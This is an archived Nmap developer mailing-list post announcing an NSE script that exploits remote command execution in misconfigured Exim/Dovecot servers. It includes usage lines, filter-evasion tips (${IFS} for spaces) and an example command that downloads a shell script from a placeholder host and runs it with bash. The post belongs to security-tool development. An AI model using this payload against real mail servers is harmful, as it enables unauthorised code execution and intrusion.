Nmap Development mailing list archives
[NSE] Exim w/ Dovecot Remote Command Execution vulnerability
From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 05 May 2013 10:16:36 -0500
Hi list, Can I get some help testing this? description = [[Attempts to exploit a remote command execution vulnerability in misconfigured Dovecot/Exim mail servers.
It is important to note that the mail server will not return the output of the command. The mail server also wont allow space characters but they can be replaced with "${IFS}". Commands can also be concatenated with "``". The script takes care of the conversion automatically when setting the argument "cmd".
References:* https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution * http://immunityproducts.blogspot.mx/2013/05/how-common-is-common-exim-and-dovecot.html
* CVE not available yet ]] ----- @usage nmap -sV --script smtp-dovecot-exim-exec --script-args smtp-dovecot-exim-exec.cmd="uname -a" <target> -- @usage nmap -p586 --script smtp-dovecot-exim-exec --script-args smtp-dovecot-exim-exec.cmd="wget -O /tmp/p example.com/test.sh;bash /tmp/p" <target>
-- -- @output -- PORT STATE SERVICE REASON -- 465/tcp open smtps syn-ack -- |_smtp-dovecot-exim-exec: Malicious payload delivered:250 OK id=XXX ---- @args smtp-dovecot-exim-exec.cmd Command to execute. Separate commands with ";".
-- @args smtp-dovecot-exim-exec.auth Authentication scheme (Optional). -- @args smtp-dovecot-exim-exec.user Authentication username (Optional). -- @args smtp-dovecot-exim-exec.pwd Authentication password (Optional).-- @args smtp-dovecot-exim-exec.from Email address to use in the FROM field. Default: nmap+domain. (Optional). -- @args smtp-dovecot-exim-exec.to Email address to use in the TO field. Default: nmap () mailinator com -- @args smtp-dovecot-exim-exec.timeout Timeout value. Default: 8000. (Optional) -- @args smtp-dovecot-exim-exec.domain Domain name to use. It attempts to set this field automatically. (Optional)
---
Attachment:
smtp-dovecot-exim-exec.nse
Description:
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] Exim w/ Dovecot Remote Command Execution vulnerability Paulino Calderon (May 05)
- Re: [NSE] Exim w/ Dovecot Remote Command Execution vulnerability David Fifield (May 06)